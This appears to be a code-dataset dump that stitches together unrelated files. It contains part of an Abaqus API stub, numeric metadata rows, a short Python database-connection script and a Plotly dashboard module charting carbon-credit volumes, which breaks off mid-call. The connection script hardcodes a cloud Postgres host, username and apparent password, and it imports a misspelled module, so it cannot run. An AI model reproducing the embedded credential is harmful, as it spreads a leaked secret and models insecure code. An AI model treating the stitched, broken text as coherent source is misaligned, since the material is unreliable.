*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
beginIncrement
An Int specifying the first increment of the step set in *beginStep* or the
SymbolicConstants STEP_START or STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endStep
An Int specifying the last step from which temperature values are to be read or the
SymbolicConstants FIRST_STEP and LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endIncrement
An Int specifying the last increment of the step set in *endStep* or the
SymbolicConstants STEP_START and STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
interpolate
A SymbolicConstant specifying whether to interpolate a field read from an output
database or results file. Possible values are OFF, ON or MIDSIDE_ONLY. The default value
is OFF.
magnitudes
A Sequence of Doubles specifying the temperature values when *distributionType*=UNIFORM
or FIELD. The value of the *magnitudes* argument is a function of the
*crossSectionDistribution* argument, as shown in the following list:
- If *crossSectionDistribution*=CONSTANT_THROUGH_THICKNESS then *magnitudes* is a Double
specifying the temperature.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_SHELL_CS then *magnitudes* is a
sequence of Doubles specifying the mean value and the gradient in the thickness
direction.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_BEAM_CS then *magnitudes* is a
sequence of Doubles specifying the mean value, the gradient in the N1 direction, and the
gradient in the N2 direction.
- If *crossSectionDistribution*=POINTS_THROUGH_SECTION then *magnitudes* is a sequence
of Doubles specifying the temperature at each point.
absoluteExteriorTolerance
A Float specifying the absolute value by which a driven node of the field can lie
outside the region of the elements of the global model. The default value is 0.0. This
argument cannot be used with *midside*.
exteriorTolerance
A Float specifying the fraction of the average element size in the global model by which
a driven node of the field can lie outside the region of the elements of the global
model. The default value is 0.0. This argument cannot be used with *midside*.
"""
pass
def setValuesInStep(self, stepName: str, field: str = '', amplitude: str = UNSET, fileName: str = '',
beginStep: SymbolicConstant = None, beginIncrement: SymbolicConstant = None,
endStep: SymbolicConstant = None, endIncrement: SymbolicConstant = None,
interpolate: SymbolicConstant = OFF, magnitudes: str = '',
absoluteExteriorTolerance: float = 0, exteriorTolerance: float = 0):
"""This method modifies the propagating data for an existing Temperature object in the
specified step.
Parameters
----------
stepName
A String specifying the name of the step in which the predefined field is modified.
field
A String specifying the name of the AnalyticalField or DiscreteField object associated
with this predefined field. The *field* argument applies only when
*distributionType*=FIELD or *distributionType*=DISCRETE_FIELD. The default value is an
empty string.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the predefined field has no amplitude reference. The default
value is UNSET.Note:*amplitude* should be given only if it is valid for the specified
step.
fileName
A String specifying the name of the file from which the temperature values are to be
read when *distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED.
beginStep
An Int specifying the first step from which temperature values are to be read or the
SymbolicConstant FIRST_STEP or LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
beginIncrement
An Int specifying the first increment of the step set in *beginStep* or the
SymbolicConstants STEP_START or STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endStep
An Int specifying the last step from which temperature values are to be read or the
SymbolicConstants FIRST_STEP and LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endIncrement
An Int specifying the last increment of the step set in *endStep* or the
SymbolicConstants STEP_START and STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
interpolate
A SymbolicConstant specifying whether to interpolate a field read from an output
database or results file. Possible values are OFF, ON or MIDSIDE_ONLY. The default value
is OFF.
magnitudes
A Sequence of Doubles specifying the temperature values when *distributionType*=UNIFORM
or FIELD. The value of the *magnitudes* argument is a function of the
*crossSectionDistribution* argument, as shown in the following list:
- If *crossSectionDistribution*=CONSTANT_THROUGH_THICKNESS then *magnitudes* is a Double
specifying the temperature.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_SHELL_CS then *magnitudes* is a
sequence of Doubles specifying the mean value and the gradient in the thickness
direction.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_BEAM_CS then *magnitudes* is a
sequence of Doubles specifying the mean value, the gradient in the N1 direction, and the
gradient in the N2 direction.
- If *crossSectionDistribution*=POINTS_THROUGH_SECTION then *magnitudes* is a sequence
of Doubles specifying the temperature at each point.
absoluteExteriorTolerance
A Float specifying the absolute value by which a driven node of the field can lie
outside the region of the elements of the global model. The default value is 0.0. This
argument cannot be used with *midside*.
exteriorTolerance
A Float specifying the fraction of the average element size in the global model by which
a driven node of the field can lie outside the region of the elements of the global
model. The default value is 0.0. This argument cannot be used with *midside*.
"""
pass
| 57.481268
| 166
| 0.672917
| 2,348
| 19,946
| 5.626065
| 0.083901
| 0.053142
| 0.039743
| 0.045042
| 0.923089
| 0.917335
| 0.907949
| 0.899622
| 0.888721
| 0.885238
| 0
| 0.00168
| 0.283967
| 19,946
| 346
| 167
| 57.647399
| 0.92326
| 0.782413
| 0
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0.117647
| 0.088235
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1cb1dc1dfa1dde6ea848a70a718d5e77d6f7abc4
| 229
|
py
|
Python
|
connect.py
|
st0623/chat_bot
|
b31cd61c0273c074f1aa54af3a5370fe55a35cb2
|
[
"Apache-2.0"
] | null | null | null |
connect.py
|
st0623/chat_bot
|
b31cd61c0273c074f1aa54af3a5370fe55a35cb2
|
[
"Apache-2.0"
] | null | null | null |
connect.py
|
st0623/chat_bot
|
b31cd61c0273c074f1aa54af3a5370fe55a35cb2
|
[
"Apache-2.0"
] | null | null | null |
import psycopq2
connection = psycopg2.connect(host="ec2-174-129-26-203.compute-1.amazonaws.com:5432", database="d9ulhkpdiac7bc", user="mvzgskipdsvaxp",password="6537b5845d6ce23156e60e7105bf3f9648baa097cf7208db697fcb56c53abc0e")
| 57.25
| 211
| 0.842795
| 22
| 229
| 8.772727
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.276018
| 0.034935
| 229
| 3
| 212
| 76.333333
| 0.597285
| 0
| 0
| 0
| 0
| 0
| 0.606987
| 0.484716
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.5
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
1cc10e4d86d587382a998fede9af7706ef7eb074
| 42,056
|
py
|
Python
|
src/apps/tco2_dashboard/figures.py
|
originalpkbims/dash-apps
|
ea84cbd3e7227fb3de40cd16000838dd088343c7
|
[
"MIT"
] | 1
|
2022-02-19T01:37:29.000Z
|
2022-02-19T01:37:29.000Z
|
src/apps/tco2_dashboard/figures.py
|
originalpkbims/dash-apps
|
ea84cbd3e7227fb3de40cd16000838dd088343c7
|
[
"MIT"
] | 12
|
2022-03-11T21:32:35.000Z
|
2022-03-30T13:45:12.000Z
|
src/apps/tco2_dashboard/figures.py
|
originalpkbims/dash-apps
|
ea84cbd3e7227fb3de40cd16000838dd088343c7
|
[
"MIT"
] | 3
|
2022-02-05T17:13:47.000Z
|
2022-03-24T00:36:45.000Z
|
from __future__ import annotations
import plotly.express as px
import plotly.graph_objects as go
import numpy as np
import pycountry
from collections import defaultdict
from .helpers import add_px_figure
from plotly.subplots import make_subplots
from .constants import FIGURE_BG_COLOR
import pandas as pd
def sub_plots_volume(df, last_df, title_indicator, title_graph, zero_evt_text):
if not(df.empty) and (df["Quantity"].sum() != 0):
fig = make_subplots(
rows=2,
cols=1,
specs=[[{"type": "domain"}], [{"type": "xy"}]],
subplot_titles=("", title_graph),
vertical_spacing=0.1,
)
fig.update_layout(font_color='white', margin=dict(t=20, b=0, l=0, r=0))
if not(last_df.empty) and (last_df["Quantity"].sum() != 0):
fig.add_trace(go.Indicator(
mode="number+delta",
value=sum(df['Quantity']),
title=dict(text=title_indicator, font=dict(size=12)),
number=dict(suffix="", font=dict(size=24)),
delta={'position': "bottom", 'reference': sum(
last_df['Quantity']), 'relative': True, 'valueformat': '.1%'},
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
else:
fig.add_trace(go.Indicator(
mode="number",
value=sum(df['Quantity']),
title=dict(text=title_indicator, font=dict(size=12)),
number=dict(suffix="", font=dict(size=24)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
add_px_figure(
px.bar(
df.groupby("Date")['Quantity'].sum().reset_index(),
x="Date",
y="Quantity",
title=title_graph,
).update_traces(marker_line_width=0),
fig,
row=2, col=1)
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(title_text="Date", showgrid=False),
yaxis=dict(title_text="Volume", showgrid=False), font_size=12,
hovermode='x unified', hoverlabel=dict(font_color='white', font_size=8),)
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def sub_plots_vintage(df, last_df, title_indicator, title_graph, zero_evt_text):
df = df[df["Vintage"] != "missing"].reset_index(drop=True)
last_df = last_df[last_df["Vintage"] != "missing"].reset_index(drop=True)
if not(df.empty):
fig = make_subplots(
rows=2,
cols=1,
specs=[[{"type": "domain"}], [{"type": "xy"}]],
subplot_titles=("", title_graph),
vertical_spacing=0.1,
)
fig.update_layout(font_color='white', margin=dict(t=20, b=0, l=0, r=0))
if not(last_df.empty):
fig.add_trace(go.Indicator(
mode="number+delta",
value=np.average(df['Vintage'], weights=df['Quantity']),
number=dict(valueformat=".1f", font=dict(size=24)),
delta={"reference": np.average(
last_df['Vintage'], weights=last_df['Quantity']), "valueformat": ".1f"},
title=dict(text=title_indicator, font=dict(size=12)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
else:
fig.add_trace(go.Indicator(
mode="number",
value=np.average(df['Vintage'], weights=df['Quantity']),
number=dict(valueformat=".1f", font=dict(size=24)),
title=dict(text=title_indicator, font=dict(size=12)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
add_px_figure(
px.bar(
df.groupby('Vintage')[
'Quantity'].sum().to_frame().reset_index(),
x='Vintage',
y='Quantity',
title=title_graph
).update_traces(marker_line_width=0),
fig,
row=2, col=1
)
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(title_text="Vintage", showgrid=False),
yaxis=dict(title_text="Volume", showgrid=False), font_size=12, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def map(df, zero_evt_text):
if not(df.empty):
df = df[df["Country"] != "missing"].reset_index(drop=True)
country_index = defaultdict(str, {country: pycountry.countries.search_fuzzy(country)[
0].alpha_3 for country in df.Country.astype(str).unique() if country != 'nan'})
country_volumes = df.groupby('Country')['Quantity'].sum(
).sort_values(ascending=False).to_frame().reset_index()
country_volumes['Country Code'] = [country_index[country]
for country in country_volumes['Country']]
country_volumes['text'] = country_volumes['Country Code'].astype(str)
fig = px.choropleth(country_volumes, locations="Country Code",
color="Quantity",
hover_name='Country',
# hover_data=['text'],
# custom_data=['text'],
color_continuous_scale=px.colors.sequential.Plasma,
height=360)
fig.update_layout(height=360, geo=dict(bgcolor='rgba(0,0,0,0)', lakecolor='#4E5D6C',
landcolor='darkgrey',
subunitcolor='grey'),
font_color='white', dragmode=False, paper_bgcolor=FIGURE_BG_COLOR, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=50, b=0, l=0, r=0),
coloraxis_colorbar=dict(thickness=10, len=0.6))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def total_volume(df, title, zero_evt_text):
if not(df.empty) and (df["Quantity"].sum() != 0):
fig = make_subplots(
rows=2,
cols=1,
specs=[[{"type": "domain"}], [{"type": "xy"}]],
vertical_spacing=0.1,
subplot_titles=("", "")
)
fig.update_layout(font_color='white', margin=dict(t=20, b=0, l=0, r=0))
fig.add_trace(go.Indicator(
mode="number",
value=sum(df['Quantity']),
title=dict(text=title, font=dict(size=12)),
number=dict(suffix="", font=dict(size=24)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
add_px_figure(
px.bar(
df.groupby("Date")['Quantity'].sum().reset_index(),
x="Date",
y="Quantity",
title=""
).update_traces(marker_line_width=0),
fig,
row=2, col=1)
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(title_text="Date", showgrid=False),
yaxis=dict(title_text="Volume", showgrid=False), hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=12)
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def total_vintage(df, zero_evt_text):
df = df[df["Vintage"] != "missing"].reset_index(drop=True)
if not(df.empty):
value = np.average(df['Vintage'], weights=df['Quantity'])
fig = make_subplots(
rows=2,
cols=1,
specs=[[{"type": "domain"}], [{"type": "xy"}]],
vertical_spacing=0.1,
subplot_titles=("", "")
)
fig.update_layout(font_color='white', margin=dict(t=20, b=0, l=0, r=0))
fig.add_trace(go.Indicator(
mode="number",
value=value,
number=dict(valueformat=".1f", font=dict(size=24)),
title=dict(text="Average Credit Vintage (total)",
font=dict(size=12)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
add_px_figure(
px.bar(
df.groupby('Vintage')[
'Quantity'].sum().to_frame().reset_index(),
x='Vintage',
y='Quantity',
title=''
).update_traces(marker_line_width=0),
fig,
row=2, col=1
)
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(title_text="Vintage", showgrid=False),
yaxis=dict(title_text="Volume", showgrid=False), hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
)
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def methodology_volume(df, zero_evt_text):
df = df[df['Methodology'] != "missing"].reset_index(drop=True)
if not(df.empty):
fig = px.bar(
df.groupby('Methodology')[
'Quantity'].sum().to_frame().reset_index(),
x='Methodology',
y='Quantity',
title=''
)
fig.update_traces(marker_line_width=0)
fig.update_layout(height=360, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False), font_color='white', hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=50, b=0, l=0, r=0))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def project_volume(df, zero_evt_text):
df = df[df['Project Type'] != "missing"].reset_index(drop=True)
if not(df.empty):
fig = px.treemap(df, path=[px.Constant("All Projects"), 'Project Type', 'Country', 'Name'], values='Quantity',
hover_data=['Name', 'Quantity'],
color_discrete_sequence=px.colors.qualitative.Antique,
height=480, title='')
fig.update_traces(textfont=dict(color='white'),
textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=50, b=20, l=0, r=0))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def project_volume_mco2(df, zero_evt_text):
df = df[df['Project Type'] != "missing"].reset_index(drop=True)
if not(df.empty):
fig = px.treemap(df, path=[px.Constant("All Projects"), 'Project Type', 'Name'], values='Quantity',
hover_data=['Name', 'Quantity'],
color_discrete_sequence=px.colors.qualitative.Antique,
height=480, title='')
fig.update_traces(textfont=dict(color='white'),
textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=20, b=20, l=0, r=0))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def pool_pie_chart(df, labels):
values = [df[f'{i} Quantity'].sum() for i in labels]
not_pool_qty = df['Total Quantity'].sum()-sum(values)
values = values + [not_pool_qty]
labels = labels + ['Not Pooled']
fig = go.Figure()
fig.add_trace(go.Pie(labels=labels, values=values, textinfo='percent', textfont=dict(
color='white', size=12), hoverlabel=dict(font_color='white', font_size=8), hole=.3))
fig.update_layout(height=360,
paper_bgcolor=FIGURE_BG_COLOR, font_color='white', font_size=8,
margin=dict(t=50, b=0, l=0, r=0),
legend=dict(x=1, font=dict(size=8)))
fig.update_traces(textposition='inside')
return fig
def bridges_pie_chart(bridges_info_dict):
labels = list(bridges_info_dict.keys())
values = [d['Dataframe']["Quantity"].sum()
for d in bridges_info_dict.values()]
fig = go.Figure()
fig.add_trace(go.Pie(labels=labels, values=values, textinfo='percent', textfont=dict(
color='white', size=12), hoverlabel=dict(font_color='white', font_size=12), hole=.3))
fig.update_layout(height=360,
paper_bgcolor=FIGURE_BG_COLOR, font_color='white', font_size=8,
margin=dict(t=50, b=0, l=0, r=0),
legend=dict(x=1, font=dict(size=12)))
fig.update_traces(textposition='inside')
return fig
def eligible_pool_pie_chart(df, pool_key):
if pool_key == "BCT":
df = df[df["Vintage"] >= 2008].reset_index()
elif pool_key == "NCT":
df = df[df["Vintage"] >= 2012].reset_index()
labels = [pool_key, f'NON_{pool_key}']
BCT = df[f'{pool_key} Quantity'].sum()
Non_BCT = df['Total Quantity'].sum() - BCT
values = [BCT, Non_BCT]
fig_eligible = go.Figure()
fig_eligible.add_trace(go.Pie(labels=labels, values=values, textinfo='percent', textfont=dict(
color='white', size=12), hoverlabel=dict(font_color='white', font_size=8), hole=.3))
fig_eligible.update_traces(marker=dict(colors=['red', 'green']))
fig_eligible.update_layout(height=300,
paper_bgcolor=FIGURE_BG_COLOR, font_color='white', font_size=12,
margin=dict(t=0, b=0, l=0, r=0))
return fig_eligible
def verra_vintage(df_verra, df_verra_toucan):
df_verra_toucan_grouped = df_verra_toucan.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped = df_verra.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df_verra_other_grouped = df_verra_grouped.merge(df_verra_toucan_grouped, how='left', left_on="Vintage",
right_on='Vintage', suffixes=('', '_Toucan'))
df_verra_other_grouped['Quantity_Toucan'] = df_verra_other_grouped['Quantity_Toucan'].fillna(
0)
df_verra_other_grouped['Quantity'] = df_verra_other_grouped['Quantity'] - \
df_verra_other_grouped['Quantity_Toucan']
df_verra_other_grouped = df_verra_other_grouped[['Vintage', 'Quantity']]
df_verra_other_grouped['Type'] = 'Rest of Issued VCU'
df_verra_toucan_grouped['Type'] = 'Toucan Bridged Credit'
df_other_and_toucan = pd.concat(
[df_verra_toucan_grouped, df_verra_other_grouped]).reset_index()
fig = px.bar(df_other_and_toucan, x="Vintage",
y="Quantity", color="Type", title="", height=360)
fig.update_layout(height=360, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False), font_color='white', hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
legend=dict(title="", orientation="h", yanchor="bottom",
y=1.02, xanchor="right", x=1
))
return fig
def verra_map(df_verra, df_verra_toucan):
df_verra_toucan_grouped = df_verra_toucan.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped = df_verra.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped = df_verra_grouped.merge(df_verra_toucan_grouped, how='left', left_on="Country",
right_on='Country', suffixes=('', '_Toucan'))
df_verra_grouped['Quantity_Toucan'] = df_verra_grouped['Quantity_Toucan'].fillna(
0)
df_verra_grouped['Ratio'] = df_verra_grouped['Quantity_Toucan'] / \
df_verra_grouped['Quantity']
df_verra_grouped = df_verra_grouped[df_verra_grouped['Ratio'] != 0]
df_verra_grouped['text'] = df_verra_grouped['Country'] + '<br>' + '<br>' + \
'Tokenized Credits = ' + df_verra_grouped['Quantity_Toucan'].map('{:,.0f}'.format).astype(str) + '<br>' +\
'Verra Issued Credits = ' + df_verra_grouped['Quantity'].map('{:,.0f}'.format).astype(str) + '<br>' +\
'Ratio = ' + \
df_verra_grouped['Ratio'].map('{:.4f}'.format).astype(str) + '<br>'
df_verra_grouped = df_verra_grouped[df_verra_grouped["Country"] != ""].reset_index(
drop=True)
country_index = defaultdict(str, {country: pycountry.countries.search_fuzzy(country)[
0].alpha_3 for country in df_verra_grouped.Country.astype(str).unique()
if country != 'nan'})
df_verra_grouped['Country Code'] = [country_index[country]
for country in df_verra_grouped['Country']]
fig = px.choropleth(df_verra_grouped, locations="Country Code",
color="Ratio",
hover_name='Country',
custom_data=['text'],
color_continuous_scale=px.colors.diverging.Picnic,
height=360)
fig.update_traces(hovertemplate="%{customdata}")
fig.update_layout(height=360, geo=dict(bgcolor='rgba(0,0,0,0)', lakecolor='#4E5D6C',
landcolor='darkgrey',
subunitcolor='grey'),
font_color='white', dragmode=False, paper_bgcolor=FIGURE_BG_COLOR, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=50, b=0, l=0, r=0),
coloraxis_colorbar=dict(thickness=10, len=0.6))
return fig
def verra_project(df_verra, df_verra_toucan):
df_verra_toucan_grouped = df_verra_toucan.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped = df_verra.groupby(
'Project Type')['Quantity'].sum().to_frame().reset_index()
df_verra_other_grouped = df_verra_grouped.merge(df_verra_toucan_grouped, how='left', left_on="Project Type",
right_on='Project Type', suffixes=('', '_Toucan'))
df_verra_other_grouped['Quantity_Toucan'] = df_verra_other_grouped['Quantity_Toucan'].fillna(
0)
df_verra_other_grouped['Quantity'] = df_verra_other_grouped['Quantity'] - \
df_verra_other_grouped['Quantity_Toucan']
df_verra_other_grouped['Type'] = 'Rest of Issued VCU'
df_verra_toucan_grouped['Type'] = 'Toucan Bridged Credit'
df_other_and_toucan = pd.concat(
[df_verra_toucan_grouped, df_verra_other_grouped]).reset_index()
fig = px.treemap(df_other_and_toucan, path=[px.Constant("All Projects"), 'Project Type', 'Type'], values='Quantity',
hover_data=['Type', 'Quantity'],
color_discrete_sequence=px.colors.qualitative.Antique,
height=480, title='')
fig.update_traces(textfont=dict(color='white'), textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=20, b=20, l=0, r=0))
return fig
def historical_prices(token_cg_dict, df_prices):
fig = go.Figure()
for i in token_cg_dict.keys():
col_name = f"{i}_Price"
filtered_df = df_prices[~df_prices[col_name].isna()]
fig.add_trace(go.Scatter(x=filtered_df['Date'], y=filtered_df[col_name],
mode='lines',
name=i
)
)
fig.update_layout(height=360, font=dict(color='white'),
xaxis_title='Date', yaxis_title='Price',
paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, xaxis=dict(
showgrid=False), yaxis=dict(showgrid=False),
margin=dict(t=50, b=20, l=0, r=0),
hovermode='x unified', hoverlabel=dict(font_color='white', font_size=8))
return fig
def pool_retired_chart(token_cg_dict, df_pool_retired):
fig = go.Figure()
for i in token_cg_dict.keys():
pool_address = token_cg_dict[i]['address']
filtered_df = df_pool_retired
filtered_df[f'Quantity_{i}'] = filtered_df['Quantity']
filtered_df.loc[filtered_df['Pool'] !=
pool_address, f'Quantity_{i}'] = 0
filtered_df = filtered_df.sort_values(by="Date", ascending=True)
filtered_df[f'Quantity_{i}'] = filtered_df[f'Quantity_{i}'].cumsum()
fig.add_trace(go.Scatter(x=filtered_df['Date'], y=filtered_df[f'Quantity_{i}'],
mode='lines',
name=i,
stackgroup='one'
)
)
fig.update_layout(height=300, font=dict(color='white'),
xaxis_title='Date', yaxis_title='Quantity',
paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, xaxis=dict(
showgrid=False), yaxis=dict(showgrid=False),
margin=dict(t=20, b=20, l=0, r=0),
hovermode='x unified', hoverlabel=dict(font_color='white', font_size=8))
return fig
def tokenized_volume(bridges_info_dict):
fig = go.Figure()
for i in bridges_info_dict.keys():
df = bridges_info_dict[i]["Dataframe"]
df = df.sort_values(by="Date", ascending=True)
df["Quantity"] = df["Quantity"].cumsum()
df['Type'] = f'{i} Bridged Credits'
fig.add_trace(go.Scatter(x=df['Date'], y=df['Quantity'],
mode='lines',
name=i,
stackgroup='one'
)
)
fig.update_layout(height=300, font=dict(color='white'),
xaxis_title='Date', yaxis_title='Quantity',
paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, xaxis=dict(
showgrid=False), yaxis=dict(showgrid=False),
margin=dict(t=20, b=20, l=0, r=0),
hovermode='x unified', hoverlabel=dict(font_color='white', font_size=8))
return fig
def on_vs_off_vintage(df_verra, bridges_info_dict):
df_verra = df_verra[df_verra["Vintage"] != "missing"]
df_verra_grouped = df_verra.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df_verra_other_grouped = pd.DataFrame()
dfs = []
for i in bridges_info_dict.keys():
df = bridges_info_dict[i]["Dataframe"]
df = df[df["Vintage"] != "missing"]
df = df.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df['Type'] = f'{i} Bridged VCUs'
dfs.append(df)
if df_verra_other_grouped.empty:
df_verra_other_grouped = df_verra_grouped.merge(df, how='left', left_on="Vintage",
right_on='Vintage', suffixes=('', f"_{i}"))
else:
df_verra_other_grouped = df_verra_other_grouped.merge(df, how='left', left_on="Vintage",
right_on='Vintage', suffixes=('', f"_{i}"))
df_verra_other_grouped[f'Quantity_{i}'] = df_verra_other_grouped[f'Quantity_{i}'].fillna(
0)
df_verra_other_grouped['Quantity'] = df_verra_other_grouped['Quantity'] - \
df_verra_other_grouped[f'Quantity_{i}']
df_verra_other_grouped = df_verra_other_grouped[[
'Vintage', 'Quantity']]
df_verra_other_grouped['Type'] = 'Rest of Issued VCUs'
df_other_and_bridges = pd.concat(
dfs + [df_verra_other_grouped]).reset_index()
fig = px.bar(df_other_and_bridges, x="Vintage",
y="Quantity", color="Type", title="", height=300)
fig.update_traces(marker_line_width=0)
fig.update_layout(height=360, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False), font_color='white', hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
legend=dict(title="", orientation="h", yanchor="bottom",
y=1.02, xanchor="right", x=1
),
